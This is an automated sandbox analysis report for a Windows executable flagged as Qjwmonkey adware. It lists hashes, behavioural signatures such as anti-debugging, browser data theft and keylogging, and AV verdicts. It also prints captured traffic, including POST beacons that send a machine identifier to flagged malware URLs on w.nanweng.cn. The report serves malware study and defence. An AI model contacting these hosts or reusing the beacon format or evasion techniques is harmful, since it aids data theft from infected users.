Windows Analysis Report
nv8401986_110422.exe

Overview

General Information

Sample name: nv8401986_110422.exe
Analysis ID: 1583791
MD5: 31549917cdc6e3f9d40a48ea5998493f
SHA1: c0f7e826645b1ba2ba1fed866992beb9de7a31df
SHA256: 73f03b369e9df60c2dc97baefcdc4ba920da3a2126c873a4654e1a83510d3b87
Tags: Adware, exe, malware, user-Joker
Infos:

Detection

Qjwmonkey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Qjwmonkey
AI detected suspicious sample
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential key logger detected (key state polling based)
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • nv8401986_110422.exe (PID: 768 cmdline: "C:\Users\user\Desktop\nv8401986_110422.exe" MD5: 31549917CDC6E3F9D40A48EA5998493F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Qjwmonkey | Yara detected Qjwmonkey | Joe Security |
Process Memory Space: nv8401986_110422.exe PID: 768 | JoeSecurity_Qjwmonkey | Yara detected Qjwmonkey | Joe Security |

Source | Rule | Description | Author | Strings
0.2.nv8401986_110422.exe.400000.0.unpack | JoeSecurity_Qjwmonkey | Yara detected Qjwmonkey | Joe Security |
        No Sigma rule has matched
        No Suricata rule has matched

        AV Detection

        Source: nv8401986_110422.exe, Avira: detected
        Source: http://w.nanweng.cn:80/qy/rq, Avira URL Cloud: Label: malware
        Source: http://w.nanweng.cn:80/qy/png, Avira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/bqd, Avira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/qy/gl1, Avira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/qy/glf, Avira URL Cloud: Label: malware
        Source: http://w.nanweng.cn:80/qy/pngsersd, Avira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/qy/gl, Avira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/qy/rqh, Avira URL Cloud: Label: malware
        Source: http://w.nanweng.cn/qy/png, Avira URL Cloud: Label: malware
        Source: http://w.nanweng.cn:80/qy/lqnrps0sid360softtm1689880905type20uid102e1490f0604c078f675cf9899bc6e6ver6, Avira URL Cloud: Label: malware
        Source: nv8401986_110422.exe, Virustotal: Detection: 87%
        Source: nv8401986_110422.exe, ReversingLabs: Detection: 86%
        Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.2% probability
        Source: nv8401986_110422.exe, Joe Sandbox ML: detected
        Source: nv8401986_110422.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: nv8401986_110422.exe, Static PE information: certificate valid
        Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.5:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 18.244.18.122:443 -> 192.168.2.5:49725 version: TLS 1.2
        Source: Binary string: #E:\654.pdb source: nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp
        Source: Binary string: E:\654.pdb source: nv8401986_110422.exe, nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00410800 GetProcAddress,GetProcAddress,GetProcAddress,SHGetPathFromIDListW,FindFirstFileW,CoInitialize,CoCreateInstance,_wcsrchr,_wcschr,CoUninitialize,FindNextFileW,FindClose,0_2_00410800
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048E0D0 CreateFileW,FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,CopyFileW,DeleteFileW,CreateFileW,GetFileSize,ReadFile,CloseHandle,0_2_0048E0D0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00457360 GetProcAddress,FindFirstFileW,CoInitialize,CoCreateInstance,GetProcAddress,GetProcAddress,GetProcAddress,CoUninitialize,FindNextFileW,FindClose,0_2_00457360
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Users\user\Desktop\nv8401986_110422.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
        Source: global trafficHTTP traffic detected: POST /qy/ov HTTP/1.1Host: w.nanweng.cn Content-Length: 186 Connection:closeAccept-Language: zh-cnCache-Conbtrol:no-cacheContent-Type:application/x-www-form-urlencodedData Raw: 26 72 70 73 3d 30 26 72 65 73 69 64 3d 30 26 72 65 73 32 69 64 3d 30 26 75 69 64 3d 31 30 32 65 31 34 39 30 66 30 36 30 34 63 30 37 38 66 36 37 35 63 66 39 38 39 39 62 63 36 65 36 26 7a 69 64 3d 26 70 61 67 3d 30 26 63 31 3d 30 26 70 6e 3d 26 72 6e 3d 26 73 6f 66 74 3d 26 61 70 70 69 64 3d 31 26 73 69 64 3d 33 36 30 26 76 65 72 3d 36 2e 30 2e 30 2e 31 31 31 31 26 76 6d 3d 31 31 26 74 6d 3d 31 36 38 39 38 38 30 39 30 35 26 74 79 70 65 3d 32 30 26 73 69 67 3d 34 37 46 32 38 46 30 37 34 41 45 43 32 37 46 35 38 30 34 32 35 45 45 39 33 36 32 30 46 36 33 36 0d 0a Data Ascii: &rps=0&resid=0&res2id=0&uid=102e1490f0604c078f675cf9899bc6e6&zid=&pag=0&c1=0&pn=&rn=&soft=&appid=1&sid=360&ver=6.0.0.1111&vm=11&tm=1689880905&type=20&sig=47F28F074AEC27F580425EE93620F636
        Source: Joe Sandbox ViewIP Address: 18.244.18.122 18.244.18.122
        Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.3.min.js HTTP/1.1Accept: */*Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: code.jquery.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /b?rn=1735914359603&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=30919B60838E69BC08808E09822668DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: */*Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sb.scorecardresearch.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /qy/png HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 13Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/gl HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 331Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/rq HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 504Host: w.nanweng.cn
        Source: global trafficHTTP traffic detected: POST /qy/lq HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 102Host: w.nanweng.cn
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00467C10 Sleep,gethostbyname,socket,htons,connect,setsockopt,setsockopt,send,recv,closesocket,Sleep,closesocket,Sleep,Sleep,closesocket,_strstr,_strstr,0_2_00467C10
        Source: global trafficDNS traffic detected: DNS query: w.nanweng.cn
        Source: global trafficDNS traffic detected: DNS query: www.msn.com
        Source: global trafficDNS traffic detected: DNS query: assets.msn.com
        Source: global trafficDNS traffic detected: DNS query: c.msn.com
        Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.com
        Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
        Source: global trafficDNS traffic detected: DNS query: 2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com
        Source: global trafficDNS traffic detected: DNS query: 45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com
        Source: global trafficDNS traffic detected: DNS query: 238358d141a1b2850f10e9a50017a441.clo.footprintdns.com
        Source: unknownHTTP traffic detected: POST /qy/png HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)Content-Length: 13Host: w.nanweng.cn
        Source: nv8401986_110422.exe, 00000000.00000002.3299397640.000000000D1F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3302728536.000000000E2C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
        Source: nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.cn
        Source: nv8401986_110422.exe, 00000000.00000003.2049616047.000000000AEA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, J0K33CCW.htm.0.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.js
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.js4r
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.js7
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jsjs
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jss
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jsyy
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, J0K33CCW.htm.0.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js$
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js=202501
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.jsj
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.jsq
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074343474.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmp, J0K33CCW.htm.0.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js9
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.jsF
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.jsv
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074343474.000000000B898000.00000004.00000800.00020000.00000000.sdmp, J0K33CCW.htm.0.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.js
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.js(
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.jsZ
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.jsm
        Source: nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAA5000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000413A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074343474.000000000B898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/
        Source: nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/$
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/&ocid=iehp&os=windows&locale=
        Source: nv8401986_110422.exe, 00000000.00000002.3288793430.000000000B921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/F
        Source: nv8401986_110422.exe, 00000000.00000002.3290752153.000000000BDD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype
        Source: nv8401986_110422.exe, 00000000.00000002.3288186724.000000000B8A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/service/MSN/Feed/me?$top=32&DisableTypeSerialization=true&activityId=7FF05383
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.png
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.png)
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.png4b0d5b40196862f17.js
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.pngansy
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.pnghidu
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.pngm
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.png
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.png(
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296440880.000000000CC20000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.png
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.png7C
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngMC
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngpC
        Source: nv8401986_110422.exe, 00000000.00000002.3278061822.0000000004740000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296440880.000000000CC20000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png...
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png...(
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.pngm
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296440880.000000000CC20000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.png
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.png7)yx
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngC.%y
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngg)
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngw
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.cn
        Source: nv8401986_110422.exe, 00000000.00000002.3288793430.000000000B939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/
        Source: nv8401986_110422.exe, 00000000.00000002.3295020523.000000000CA20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/https://assets.msn.com
        Source: nv8401986_110422.exe, 00000000.00000002.3288186724.000000000B8A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/https://assets.msn.cominternetExpl
        Source: nv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.cominternetExplorer
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.microsoftstart.cn/OneCollector/1.0
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.cn/OneCollector/1.0
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004114000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2134989538.000000000D6D0000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2134917852.000000000D6CD000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2134726476.000000000D6C8000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2134166907.000000000D6C0000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2134523903.000000000D6C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea
